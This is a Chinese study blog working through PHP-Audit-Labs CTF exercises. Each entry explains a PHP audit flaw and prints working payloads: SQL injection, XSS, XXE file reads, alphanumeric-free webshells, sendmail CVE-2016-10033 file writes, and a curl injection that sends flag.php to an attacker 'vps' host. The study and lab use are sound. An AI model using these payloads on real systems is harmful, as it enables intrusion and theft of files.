PHP-Audit-Labs审计学习

打算在代码审计上入下坑。本来找了个不知名cms想审计一下的。偶然间看到了星盟王叹之师傅在用php-audit-labs练审计,所以自己也打算练一下审计的技术,毕竟自己审计功力太差了...p牛也曾经说过,练习审计到能看懂一个完整的CMS就算有一定功底了。所以就把php-audit-labs的全部都过一遍吧。

(最近也总算熟练了一下node跟python相关的开发入门。等之后找时间把java入门知识过一遍,再把ECMAscript6的基础过一遍就差不多了）

Day1

in_array()

任意文件上传漏洞。主要问题在于in_array()函数的使用不当。如果未设置in_array()第三个参数为true则我们可以通过上传7shell.php绕过检查。因为7shell.php被转换为7.
同样出现在某cms中利用这点可以绕过进行insert_into注入

当in_array()绕过后轻松达成注入。
1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));#

练习

config.php

index.php

connect_error) {
    die("连接失败: ");
}

$sql = "SELECT COUNT(*) FROM users";
$whitelist = array();
$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    $whitelist = range(1, $row['COUNT(*)']);
}

$id = stop_hack($_GET['id']);
$sql = "SELECT * FROM users WHERE id=$id";

if (!in_array($id, $whitelist)) {
    die("id $id is not in whitelist.");
}

$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    echo "";
    foreach ($row as $key => $value) {
        echo "
";
        echo "
";
    }
    echo "
$key
$value";
}
else{
    die($conn->error);
}

?>

这题的in_array()并不是难点。因为只要id开头为数字就能绕过了
主要问题在于后面注入上。
所幸语句中会爆出sqlerror.在过滤了这些关键字的情况下仍可以使用报错函数,select,from等基本就足够得到flag了。
不过这里存在一个细节,就是updatexml这样的报错函数如果语句中不包含特殊字符也就是我们原来经常使用的0x7e之类的字符，爆出的结果将会出现字符丢失的现象。

所以找替代的字符串连接函数即可.make_set()

?id=4 and (select updatexml(1,make_set(3,'~',(select flag from flag)),1))

其实自己原来做sql注入的题目也曾搜索过相关的内容。比如在concat被过滤的情况下不使用group_concat将所有查询结果都列出来。当时发现make_set()是能起到concat一样的效果的。但是注意的是,make_set至少接收两个参数,因此必须使用逗号。concat类则不然。

Day2

filter_var()

题目主要是在两处存在过滤。首先是twig模板里出现的{{link|escape}}(这种写法属于twig中 {{表达式|filters}} 的写法)

然后是一个filter_var()函数
这里escape过滤器调用的实际上是htmlspecialchars()函数。作用自然是将常见的特殊字符转为实体字符。
而filter_var()在curl的ssrf中就曾见过。主要检查一个url是否合法。
因此代码逻辑主要是经过过滤后生成一个a标签。
那么可能存在self-xss

官方的payload
?nextSlide=javascript://comment％250aalert(1)达到弹窗的self-xss. 使用javascript伪协议绕过
巧妙的就是利用filtervar的缺陷轻松使用xxx://的形式绕过检查。然后也可以进行js语句的执行。重要的一点就是//在js中是注释符。因此使用%250a(double urlencode %0a 以绕过浏览器自动的解码)将后面的内容换行到下一行。成功执行alert.

某cms中的利用是,在访问404页面存在这样的代码

current_url()方法接受完整的404url参数。返回最后一个/后的内容拼接进code代码块。即可以插入xss代码导致了xss
payloadhttp://localhost/anchor/index.php/

练习

// index.php
You have curl {$site_info['host']} successfully!
              ";
        echo implode(' ', $result);
    }
    else{
        die("<center><h1>Error: Host not allowed</h1></center>");
    }

}
else{
    echo "<center><h1>Just curl sec-redclub.com!</h1></center><br>
          <center><h3>For example:?url=http://sec-redclub.com</h3></center>";
}

?>
</code></pre> 
 <pre><code class="php">// f1agi3hEre.php
<?php  
$flag = "HRCTF{f1lt3r_var_1s_s0_c00l}"
?>
</code></pre> 
 <p>一个明显的curl。而且还是经典的可绕过的<code>filter_var()</code>+<code>parse_url()</code>+<code>exec()</code>执行curl的配置。<br> 那现在关键是利用这个来进行文件读取。<br> 比如把之前的可绕过<code>filter_var()</code>+<code>parse_url()</code>的payload拿出来</p> 
 <pre><code>demo://evil.com:80;sec-redclub.com:80/
demo://evil.com:80,sec-redclub.com:80/
</code></pre> 
 <p>这里想要执行命令读取文件。那么恰好可以用到linux中使用分号进行命令分割的作用。<br> <code>demo://%22;ls;%23;sec-redclub.com:80/</code><br> 然后为了读文件使用<code><</code>代替空格<br> <code>demo://%22;cat%20f1agi3hEre.php;%23;sec-redclub.com:80/</code></p> 
 <p>单纯针对filter_var的话把七月火师傅的payload放出来</p> 
 <pre><code>http://localhost/index.php?url=http://demo.com@sec-redclub.com
http://localhost/index.php?url=http://demo.com&sec-redclub.com
http://localhost/index.php?url=http://demo.com?sec-redclub.com
http://localhost/index.php?url=http://demo.com/sec-redclub.com
http://localhost/index.php?url=demo://demo.com,sec-redclub.com
http://localhost/index.php?url=demo://demo.com:80;sec-redclub.com:80/
http://localhost/index.php?url=http://demo.com#sec-redclub.com
PS:最后一个payload的#符号，请换成对应的url编码 %23
</code></pre> 
 <h2>Day3</h2> 
 <h3>class_exists()&&内部类xxe</h3> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 559px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption"></div> 
 </div> 
 <p>上面的代码有一个比较过时的路径穿越的文件包含的洞。<br> 即调用<code>class_exists()</code>函数时会自动加载__autoload()。达成文件包含。如果是ph5-5.3则可以构造路径穿越。<br> 还有一个洞比较有意思。实例化类的类名和传入类的参数均可控。此时即使没有恶意类我们也能用SimpleXMLElement构造xxe攻击。这点我在buu上做<br> SUCTF 2018 Homework这题时也用到了它达成xxe并进一步使用xxe打ssrf</p> 
 <p>某cms的利用是一个可控变量带来的反序列化XXE.具体利用不谈。简单说下gadget最后的利用。类中实现了一个反射类实例化。而类名可控。之后连反射类的参数也是可控的。导致我们可以任意实例化SimpleXMLElement并构造xxepayload进行攻击。<br> 根据实际情况构造payload<br> <code>{"Shopware\\Bundle\\SearchBundle\\Sorting\\PriceSorting":{"direction":"asc"}}</code><br> 这里几个参数尤其是2那个印象很深刻,同时也很必要。SUCTF那题就是如此<br> <code>{"SimpleXMLElement":{"data":"http://localhost/xxe.xml","options":2,"data_is_url":1,"ns":"","is_prefix":0}}</code></p> 
 <h3>练习</h3> 
 <pre><code class="php">// index.php
<?php
class NotFound{
    function __construct()
    {
        die('404');
    }
}
spl_autoload_register(
    function ($class){
        new NotFound();
    }
);
$classname = isset($_GET['name']) ? $_GET['name'] : null;
$param = isset($_GET['param']) ? $_GET['param'] : null;
$param2 = isset($_GET['param2']) ? $_GET['param2'] : null;
if(class_exists($classname)){
    $newclass = new $classname($param,$param2);
    var_dump($newclass);
    foreach ($newclass as $key=>$value)
        echo $key.'=>'.$value.'<br>';
}
</code></pre> 
 <pre><code class="php">// f1agi3hEre.php
<?php
$flag = "HRCTF{X33_W1tH_S1mpl3Xml3l3m3nt}";
?>
</code></pre> 
 <p>利用经过上面的铺垫就很简单了。直接用可控的参数进行xxe即可。但是需要注意的是,xxe需要进行php文件流来进行内容读取。因为<code>< > & ' "</code>等字符会使xml解析出错。不过用base64读文件这种解决办法想必早就是轻车熟路了吧。<br> <code>?name=SimpleXMLElement¶m=<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/CTF/f1agi3hEre.php">]><x>%26xxe;</x>¶m2=2</code></p> 
 <p>假如题目不知道flag的名字还可以用另外的类进行文件名的读取。<br> <code>?name=GlobIterator¶m=./*.php¶m2=0</code><br> 作用与glob差不多。</p> 
 <h2>Day4</h2> 
 <h3>str_pos()错误使用</h3> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 448px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption"></div> 
 </div> 
 <p>php许多函数因为弱类型或黑魔法诞生了各种各样的漏洞。str_pos()也是如此。上面的代码看似严格限制了内容不能含有<code><</code>与<code>></code>。然而str_pos返回的值可以是0.<br> 即匹配的字符串首个字符就是<code><</code>，<code>></code>。既然如此，<code>！strpos()</code>返回的就是真值。成功绕过。<br> payload:<br> <code><"><injected-tag%20property="&pass=<injected-tag></code><br> 同样类似的漏洞也常见于preg_match()这样的函数。因为它可能会因为传入数组或者正则回溯导致返回false值。如果开发者所写的判断只是<code>!preg_match()</code>就很容易绕过了。</p> 
 <p>某CMS中的问题也是弱类型的锅。使用若类型相等判断时，假如数据库中存储的值是空字符串。那么当null与""进行弱类型相等时将返回true.</p> 
 <pre><code class="php">null=='' //true
"0.0"=="0" //true
"0."=="0" //true
"0e"=="0" //true
</code></pre> 
 <h3>练习</h3> 
 <p>这是攻防世界上做过的原题。应该是lottery这个把。用到的是json的弱类型。json弱类型判相等时，只要传入true与非零数字。结果都将返回true</p> 
 <p>json弱类型比较出名的一个比较就是数字与字符串之间的转换</p> 
 <pre><code>0=="0a....sds"
12=="12fw...sd"
789=="789asabxz"
</code></pre> 
 <p>字符串会被直接截取前面的纯数字部分进行判断</p> 
 <h2>Day5</h2> 
 <h3>escapeshellcmd()+escapeshellarg()</h3> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 763px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption"></div> 
 </div> 
 <p>主体上就是一个过滤了后的mail函数执行。<br> mail函数的参数是这样的</p> 
 <pre><code class="php">bool mail (
    string $to ,
    string $subject ,
    string $message [,
    string $additional_headers [,
    string $additional_parameters ]]
)
</code></pre> 
 <p>由于默认调用的是linux的sendmail函数，所以可以在<code>message</code>中写入恶意代码。接着由additional_parameters 指定额外参数，从而写入在指定目录写入文件。</p> 
 <p>但是，php的mail函数也在底层默认执行了一层<code>escapeshellcmd()</code>函数，那么显然转义了我们的恶意代码。<br> 不过，本题代码还有一处经典的<code>escapeshellarg()</code>。如果<code>escapeshellarg()</code>+<code>escapeshellcmd()</code>搭配使用，将出现特殊字符逃逸的问题。<br> buu上也有一个类似的题目.这里则借用项目里的例子简单介绍下</p> 
 <pre><code class="bash">127.0.0.1' -v -d a=1
#escapeshellarg
'127.0.0.1'\'' -v -d a=1'
#escapeshellcmd
'127.0.0.1'\\'' -v -d a=1\'
</code></pre> 
 <p>此时最后一步可以看出，<code>\\</code>将被解释为<code>\</code>不再起到转义的作用，而是作为换行符。因此payload变为先是<code>127.0.0.1</code>，再<code>-v -d</code>-d对应的数据为<code>a=1'</code>.</p> 
 <p>比如CVE-2016-10033 跟CVE-2016-10045的两个payload</p> 
 <pre><code>a( -OQueueDirectory=/tmp -X/var/www/html/x.php )@a.com

a'( -OQueueDirectory=/tmp -X/var/www/html/x.php )@a.com
</code></pre> 
 <p>前者没有escapeshellcmd直接打。后者escapeshellcmd后又加了一层escapeshellarg导致字符逃逸。</p> 
 <h3>练习</h3> 
 <pre><code class="php">//index.php
<?php
highlight_file('index.php');
function waf($a){
    foreach($a as $key => $value){
        if(preg_match('/flag/i',$key)){
            exit('are you a hacker');
        }
    }
}
foreach(array('_POST', '_GET', '_COOKIE') as $__R) {
    if($$__R) { 
        foreach($$__R as $__k => $__v) { 
            if(isset($$__k) && $$__k == $__v) unset($$__k); 
        }
    }

}
if($_POST) { waf($_POST);}
if($_GET) { waf($_GET); }
if($_COOKIE) { waf($_COOKIE);}

if($_POST) extract($_POST, EXTR_SKIP);
if($_GET) extract($_GET, EXTR_SKIP);
if(isset($_GET['flag'])){
    if($_GET['flag'] === $_GET['hongri']){
        exit('error');
    }
    if(md5($_GET['flag'] ) == md5($_GET['hongri'])){
        $url = $_GET['url'];
        $urlInfo = parse_url($url);
        if(!("http" === strtolower($urlInfo["scheme"]) || "https"===strtolower($urlInfo["scheme"]))){
            die( "scheme error!");
        }
        $url = escapeshellarg($url);
        $url = escapeshellcmd($url);
        system("curl ".$url);
    }
}
?>
</code></pre> 
 <pre><code class="php">// flag.php
<?php
$flag = "HRCTF{Are_y0u_maz1ng}";
?>
</code></pre> 
 <p>很明显的变量覆盖，之后要绕过waf。再接下来就是escapeshellsmd/arg的搭配进行命令执行了。<br> 首先要解决的是，我们必须绕过preg_match的限制才能传入flag变量。因此要利用好它写好的这个功能。</p> 
 <p>首先这里利用了可变变量的特性。假设我们提交</p> 
 <pre><code>?flag=test 
post:_GET[flag]=test
</code></pre> 
 <p>当开始遍历 <code>$_POST</code> 超全局数组的时候， <code>$__k</code> 代表 _GET[flag] ，所以 <code>$$__k</code>就是 <code>$_GET[flag]</code> ，即 test 值，此时 <code>$$__k == $__v</code> 成立，变量 <code>$_GET[flag]</code> 就被 unset 了</p> 
 <p>而接下来下面又有一个变量覆盖<br> <code>if($_POST) extract($_POST, EXTR_SKIP);</code><br> 所以直接得到<code>$_GET[flag]=test</code>绕过第一层</p> 
 <p>第二层只需利用0e的MD5弱类型比较<br> 最后是curl的命令执行<br> <code>http://baidu.com/' -F file=@/var/www/html/flag.php -x vps:9999</code><br> 似乎当curl版本变高后，将不再能执行。<br> <code>curl '127.0.0.1'\''</code></p> 
 <h2>Day6</h2> 
 <h3>正则不当导致路径穿越</h3> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 447px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption"></div> 
 </div> 
 <p>任意文件删除漏洞。主要是<code>preg_replace()</code>函数的使用不当。忽略了<code>../../</code>这种路径。可以使用路径穿越进行任意文件删除</p> 
 <h3>练习</h3> 
 <pre><code class="php">// index.php
<?php
include 'flag.php';
if  ("POST" == $_SERVER['REQUEST_METHOD'])
{
    $password = $_POST['password'];
    if (0 >= preg_match('/^[[:graph:]]{12,}$/', $password))
    {
        echo 'Wrong Format';
        exit;
    }
    while (TRUE)
    {
        $reg = '/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/';
        if (6 > preg_match_all($reg, $password, $arr))
            break;
        $c = 0;
        $ps = array('punct', 'digit', 'upper', 'lower');
        foreach ($ps as $pt)
        {
            if (preg_match("/[[:$pt:]]+/", $password))
            $c += 1;
        }
        if ($c < 3) break;
        if ("42" == $password) echo $flag;
        else echo 'Wrong password';
        exit;
    }
}
highlight_file(__FILE__);
?>
</code></pre> 
 <p>练习里的正则写的十分罕见。其实使用到的是php的字符类。除了一看就懂的upper这些，其他的字符类的含义是</p> 
 <pre><code>graph 空格以外的可打印字符
punct  打印字符，不包括字母数字
</code></pre> 
 <p>主要函数里，第一个正则表示匹配到可打印字符12个以上;第二个正则表示把连续的符号、数字、大写、小写，作为一段，至少分六段;第三个正则表示输入的字符串至少含有符号、数字、大写、小写中的三种类型。</p> 
 <p>最后与数字进行弱类型比较。<br> payload</p> 
 <pre><code>42.00e+00000
</code></pre> 
 <p>红日的文章里还提到了一个配置不当写shell的问题。</p> 
 <pre><code class="php"><?php
if(!isset($_GET['option'])) die();
$str = addslashes($_GET['option']);
$file = file_get_contents('./config.php');
$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
file_put_contents('./config.php', $file);
</code></pre> 
 <p>这个是不带修饰符模式的正则匹配.<br> 第一种方法</p> 
 <pre><code class="php">http://127.0.0.1/index.php?option=a';%0aphpinfo();//
http://127.0.0.1/index.php?option=a
</code></pre> 
 <p>第一个payload写入内容后只有一个单引号被转义的问题。而第二部分再传入一个a时就会因为<code>.*</code>匹配无数次而把<code>\</code>换掉</p> 
 <p>还有两种preg_replace的方法、这里提下第二种，也就是还适用于单行(非贪婪)模式的payload。之前安恒的套娃web2里出现过。</p> 
 <pre><code>http://127.0.0.1/test/ph.php?option=;phpinfo();
http://127.0.0.1/test/ph.php?option=$0
</code></pre> 
 <p>其最后的效果是下面这样的</p> 
 <pre><code><?php
$option='$option=';phpinfo();';';
</code></pre> 
 <h2>Day7</h2> 
 <h3>parse_str()变量覆盖</h3> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 519px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption"></div> 
 </div> 
 <blockquote> 
  <p>parse_str的作用就是解析字符串并且注册成变量，它在注册变量之前不会验证当前变量是否存在，所以会直接覆盖掉当前作用域中原有的变量。</p> 
 </blockquote> 
 <p>所以此处存在的变量问题就是<code>parse_str()</code>处理了我们可控的参数后,是可以起到控制全局变量的效果的。因此可以控制<code>$config</code>变量及其对应的参数。达成变量覆盖。</p> 
 <p>解决这类变量覆盖问题的最好方法还是通过检查某一变量是否已经设定过了(<code>isset()</code>)。这样在没有设定过变量的else分支才能安全使用<code>parse_str()</code></p> 
 <h3>练习</h3> 
 <pre><code class="php">//index.php
<?php
$a = “hongri”;
$id = $_GET['id'];
@parse_str($id);
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
    echo '<a href="uploadsomething.php">flag is here</a>';
}
?>
</code></pre> 
 <pre><code class="php">//uploadsomething.php
<?php
header("Content-type:text/html;charset=utf-8");
$referer = $_SERVER['HTTP_REFERER'];
if(isset($referer)!== false) {
    $savepath = "uploads/" . sha1($_SERVER['REMOTE_ADDR']) . "/";
    if (!is_dir($savepath)) {
        $oldmask = umask(0);
        mkdir($savepath, 0777);
        umask($oldmask);
    }
    if ((@$_GET['filename']) && (@$_GET['content'])) {
        //$fp = fopen("$savepath".$_GET['filename'], 'w');
        $content = 'HRCTF{y0u_n4ed_f4st}   by:l1nk3r';
        file_put_contents("$savepath" . $_GET['filename'], $content);
        $msg = 'Flag is here,come on~ ' . $savepath . htmlspecialchars($_GET['filename']) . "";
        usleep(100000);
        $content = "Too slow!";
        file_put_contents("$savepath" . $_GET['filename'], $content);
    }
   print <<<EOT
<form action="" method="get">
<div class="form-group">
<label for="exampleInputEmail1">Filename</label>
<input type="text" class="form-control" name="filename" id="exampleInputEmail1" placeholder="Filename">
</div>
<div class="form-group">
<label for="exampleInputPassword1">Content</label>
<input type="text" class="form-control" name="content" id="exampleInputPassword1" placeholder="Contont">
</div>
<button type="submit" class="btn btn-default">Submit</button>
</form>
EOT;
}
else{
    echo 'you can not see this page';
}
?>
</code></pre> 
 <p>第一部分是一个比较刻意的<code>parse_str()</code>变量覆盖的用例。只要解决md5弱类型比较的问题就好了</p> 
 <pre><code>?id=a[0]=s878926199a 
</code></pre> 
 <p>第二部分先是注意一个referer头要带上。之后就是一个读flag的问题了。因为flag的内容会在挂起0.1s然后被替换掉。所以需要我们去条件竞争。当然这里上传目录是固定的。所以就可以放心发包了。</p> 
 <h2>Day8</h2> 
 <h3>preg_replace/e</h3> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 652px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption"></div> 
 </div> 
 <p>这是一个自己刚了解CTF不久时接触的一个<code>preg_replace()</code>在<code>/e</code>下存在代码执行的漏洞了。当然这个洞是php5.5版本的</p> 
 <p>我们的参数可以控制preg_replace的第一，三个参数。达成任意代码执行。</p> 
 <p>然后当时也是读到一篇文章专门讲到这里payload的构造<br> 原本官方的payload</p> 
 <pre><code>/?.*={${phpinfo()}}
</code></pre> 
 <p>如果GET请求的参数名存在非法字符，PHP会将其替换成下划线，即<code>.*</code> 会变成 <code>_*</code><br> 而实际可行的payload</p> 
 <pre><code>\S*=${phpinfo()} 
</code></pre> 
 <h3>练习</h3> 
 <pre><code class="php">// index.php
<?php
include 'flag.php';
if(isset($_GET['code'])){
    $code=$_GET['code'];
    if(strlen($code)>40){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9]+/",$code)){
        die("NO.");
    }
    @eval($code);
}
else{
    highlight_file(__FILE__);
}
highlight_file(__FILE);
// $hint = "php function getFlag() to get flag";

?>
</code></pre> 
 <pre><code class="php">// index2.php
<?php
include 'flag.php';
if(isset($_GET['code'])){
    $code=$_GET['code'];
    if(strlen($code)>50){
        die("Too Long.");
    }
    if(preg_match("/[A-Za-z0-9_]+/",$code)){
        die("Not Allowed.");
    }
    @eval($code);
}
else{
    highlight_file(__FILE__);
}
highlight_file(__FILE);
// $hint = "php function getFlag() to get flag";
?> 
</code></pre> 
 <p>已经司空见惯的无数字字母webshell书写了</p> 
 <p>留一个FUZZ脚本</p> 
 <pre><code class="php"><?php
$a = str_split('getFlag');
for($i = 0; $i < 256; $i++){
    $ch = '{'^ chr($i);
    if (in_array($ch, $a , true)) {
        echo "{ ^ chr(".$i.") = $ch<br>";
    }
}
echo "{{{{{{{"^chr(28).chr(30).chr(15).chr(61).chr(23).chr(26).chr(28);

?>
</code></pre> 
 <p>payload1</p> 
 <pre><code>$_="{{{{{{{"^"%1c%1e%0f%3d%17%1a%1c";$_();
</code></pre> 
 <p>payload2</p> 
 <pre><code>$哼="{{{{{{{"^"%1c%1e%0f%3d%17%1a%1c";$哼();
</code></pre> 
 <p>上次做36d的某道题自己用了最极限的无数字字母且不能异或取反的webshell。也就是通配符加上php临时文件命令执行。那个应该算是比较难用的，但可以解决大部分waf了</p> 
 <h2>Day9</h2> 
 <h3>str_replace()过滤不当</h3> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 415px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption"></div> 
 </div> 
 <p>一个比较明显的过滤函数问题。它只是将<code>../</code>替换为空。那么很容易就能使用<code>....//</code>进行双写绕过<br> 然后就是<code>require_once()</code>的文件包含了。</p> 
 <p>CMS实例就是造成路径穿越,得到任意文件读取。<br> 当然双写/url二次编码进行路径穿越的技巧其实也算很常见了。</p> 
 <h3>练习</h3> 
 <pre><code class="php">/ index.php
<?php  
include 'config.php';
include 'function.php';

$conn = new mysqli($servername,$username,$password,$dbname);
if($conn->connect_error){
    die('连接数据库失败');
}

$sql = "SELECT COUNT(*) FROM users";
$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    $id = $row['COUNT(*)'] + 1;
}
else die($conn->error);

if(isset($_POST['msg']) && $_POST['msg'] !==''){
    $msg = addslashes($_POST['msg']);
    $msg = replace_bad_word(convert($msg));
    $sql = "INSERT INTO users VALUES($id,'".$msg."')";
    $result = $conn->query($sql);
    if($conn->error) die($conn->error);
}
echo "<center><h1>Welcome come to HRSEC message board</center></h1>";
echo <<<EOF
<center>
    <form action="index.php" method="post">
        <p>Leave a message: <input type="text" name="msg" /><input type="submit" value="Submit" /></p>
    </form>
</center>
EOF;
$sql = "SELECT * FROM users";
$result = $conn->query($sql);
if($result->num_rows > 0){
    echo "<center><table border='1'><tr><th>id</th><th>message</th><tr></center>";
    while($row = $result->fetch_row()){
        echo "<tr><th>$row[0]</th><th>$row[1]</th><tr>";
    }
    echo "</table></center>";
}
$conn->close();
?>
</code></pre> 
 <pre><code class="php">// function.php
<?php  
function replace_bad_word($str){
    global $limit_words;
    foreach ($limit_words as $old => $new) {
        strlen($old) > 2 && $str = str_replace($old,trim($new),$str);
    }
    return $str;
}

function convert($str){
    return htmlentities($str);
}

$limit_words = array('造反' => '造**', '法轮功' => '法**');

foreach (array('_GET','_POST') as $method) {
    foreach ($$method as $key => $value) {
        $$key = $value;
    }
}
?>
</code></pre> 
 <p>// config.php</p> 
 <pre><code class="php"><?php  
$servername = "localhost";
$username = "hongrisec";
$password = "hongrisec";
$dbname = "day9";
?>
# 搭建CTF环境使用的sql语句
create database day9;
use day9;
create table users(
id integer auto_increment not null primary key,
message varchar(50)
);
create table flag( flag varchar(40));
insert into flag values('HRCTF{StR_R3p1ac3_anD_sQ1_inJ3ctIon_zZz}');
</code></pre> 
 <p>可控的msg变量被拼接进sql语句。但是却经过了html实体编码,转义,过滤个别词的操作。</p> 
 <p>不过,在function.php却存在很明显的变量覆盖漏洞。那么我们可以通过覆盖<code>$limit_words</code>数组，来逃逸单引号.</p> 
 <p>最后payload</p> 
 <pre><code>1%00' and updatexml(1,concat(0x7e,(select flag from flag),0x7e),1))#&limit_words[\0\]=
1%00' and updatexml(1,concat(0x7e,(select reverse(flag) from flag),0x7e),1))#&limit_words[\0\]=
</code></pre> 
 <h2>Day10</h2> 
 <h3>程序判错未exit()</h3> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 326px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption"></div> 
 </div> 
 <p>这里的问题主要是:代码虽然有相应的防御操作，但是程序未立即停止退出，导致程序继续执行的问题</p> 
 <p>此处<code>extract()</code>得到了一个变量覆盖的利用<br> 加上<code>assert()</code>，所以pi变量直接给webshell代码即可</p> 
 <p>我个人一次体验比较深的经历是:在htb的某个靶机中。有一处php代码中曾经限定只有指定用户访问(检查session),才会显示其ssh密钥。而此时我们的权限是www-data.看似无法获得ssh密钥,但是其代码中出现了疏忽,在对user的session判别后没有立即<code>exit()</code>.那么当我们以www-data直接本地curl这一网页时,将可以得到密钥,进而提权。</p> 
 <h3>练习</h3> 
 <pre><code class="php">// index.php
<?php
include 'config.php';
function stophack($string){
    if(is_array($string)){
        foreach($string as $key => $val) {
            $string[$key] = stophack($val);
        }
    }
    else{
        $raw = $string;
        $replace = array("\\","\"","'","/","*","%5C","%22","%27","%2A","~","insert","update","delete","into","load_file","outfile","sleep",);
        $string = str_ireplace($replace, "HongRi", $string);
        $string = strip_tags($string);
        if($raw!=$string){
            error_log("Hacking attempt.");
            header('Location: /error/');
        }
        return trim($string);
    }
}
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
    die("连接失败: ");
}
if(isset($_GET['id']) && $_GET['id']){
    $id = stophack($_GET['id']);
    $sql = "SELECT * FROM students WHERE id=$id";
    $result = $conn->query($sql);
    if($result->num_rows > 0){
        $row = $result->fetch_assoc();
        echo '<center><h1>查询结果为：</h1><pre>'.<<<EOF
        +----+---------+--------------------+-------+
        | id | name    | email              | score |
        +----+---------+--------------------+-------+
        |  {$row['id']} | {$row['name']}   | {$row['email']}   |   {$row['score']} |
        +----+---------+--------------------+-------+</center>
EOF;
    }
}
else die("你所查询的对象id值不能为空！");
?>
</code></pre> 
 <p>显然,程序如果检测到非法字符或单词，都会将其替换成字符串 HongRi ，然而并没有立即退出，这样攻击者输入的攻击语句还是会继续被带入数据库查询。只不过这里关键词都被替换成了字符串 HongRi</p> 
 <p>简单的使用benchmark替换sleep即可盲注</p> 
 <pre><code>-1 or if(ascii(mid((select flag from flag),1,1))=115,benchmark(200000000,7^3^8),0)
</code></pre> 
 <h2>Day11</h2> 
 <h3>php反序列化</h3> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 664px;"> 
   <div class="image-view">  
   </div> 
  </div> 
  <div class="image-caption"></div> 
 </div> 
 <p>(第11行正则表达式应改为：'/O:\d:/')</p> 
 <p>首先确认了存在反序列化。且数据是cookie可控。那么考虑下绕过执行反序列化。</p> 
 <p>那么看下loaddata里的限制<br> 开头不能是<code>O:</code>,即反序列化内容不为对象<br> 同时需要不能匹配字符串为<code>O:任意十进制:</code><br> 如果只是第一部分当然可以使用数组绕过。但是这样第二部分还是会匹配到数组中的对象成分。</p> 
 <p>这里用到的是一个比较老的绕过方法了。即使用<code>O:+</code>绕过。而原理可以涉及到底层源码。函数遇到<code>+</code>号时会继续向下判断，因此可以正常反序列化。</p> 
 <p>最后就能成功执行写文件webshell了。</p> 
 <h3>练习</h3> 
 <pre><code class="php"><?php
include "config.php";

class HITCON{
   public $method;
   public $args;
   public $conn;

   function __construct($method, $args) {
       $this->method = $method;
       $this->args = $args;
       $this->__conn();
   }

   function __conn() {
       global $db_host, $db_name, $db_user, $db_pass, $DEBUG;
       if (!$this->conn)
           $this->conn = mysql_connect($db_host, $db_user, $db_pass);
       mysql_select_db($db_name, $this->conn);
       if ($DEBUG) {
           $sql = "DROP TABLE IF  EXISTS  users";
           $this->__query($sql, $back=false);
           $sql = "CREATE TABLE IF NOT EXISTS users (username VARCHAR(64),
           password VARCHAR(64),role VARCHAR(256)) CHARACTER SET utf8";

           $this->__query($sql, $back=false);
           $sql = "INSERT INTO users VALUES ('orange', '$db_pass', 'admin'), ('phddaa', 'ddaa', 'user')";
           $this->__query($sql, $back=false);
       }
       mysql_query("SET names utf8");
       mysql_query("SET sql_mode = 'strict_all_tables'");
   }

   function __query($sql, $back=true) {
       $result = @mysql_query($sql);
       if ($back) {
           return @mysql_fetch_object($result);
       }
   }
 
   function login() {
       list($username, $password) = func_get_args();
       $sql = sprintf("SELECT * FROM users WHERE username='%s' AND password='%s'", $username, md5($password));
       $obj = $this->__query($sql);

       if ( $obj != false ) {
           define('IN_FLAG', TRUE);
           $this->loadData($obj->role);
       }
       else {
         $this->__die("sorry!");
       }
   }

   function loadData($data) {
       if (substr($data, 0, 2) !== 'O:' && !preg_match('/O:\d:/', $data)) {
           return unserialize($data);
       }
       return [];
   }
 
   function __die($msg) {
       $this->__close();
       header("Content-Type: application/json");
       die( json_encode( array("msg"=> $msg) ) );
   }

   function __close() {
       mysql_close($this->conn);
   }

   function source() {
       highlight_file(__FILE__);
   }

   function __destruct() {
       $this->__conn();
       if (in_array($this->method, array("login", "source"))) {
           @call_user_func_array(array($this, $this->method), $this->args);
       }
       else {
           $this->__die("What do you do?");
       }
       $this->__close();
   }

   function __wakeup() {
       foreach($this->args as $k => $v) {
           $this->args[$k] = strtolower(trim(mysql_escape_string($v)));
       }
   }
}
class SoFun{
   public $file='index.php';

   function __destruct(){
       if(!empty($this->file)) {
           include $this->file;
       }
   }
   function __wakeup(){
       $this-> file='index.php';
   }
}
if(isset($_GET["data"])) {
   @unserialize($_GET["data"]);
}
else {
   new HITCON("source", array());
}

?>
</code></pre> 
 <pre><code class="php">//config.php
<?php
    $db_host = 'localhost';
    $db_name = 'test';
    $db_user = 'root';
    $db_pass = '123';
    $DEBUG = 'xx';
?>
</code></pre> 
 <pre><code class="php">// flag.php
<?php
!defined('IN_FLAG') && exit('Access Denied');
echo "flag{un3eri@liz3_i3_s0_fun}";

?>
</code></pre> 
 <p>先从简单的看起,首先是SoFun类。显然绕过wakeup即可include可控数据flag.php。但是需要注意flag.php限制了必须<code>defined('IN_FLAG')</code>。</p> 
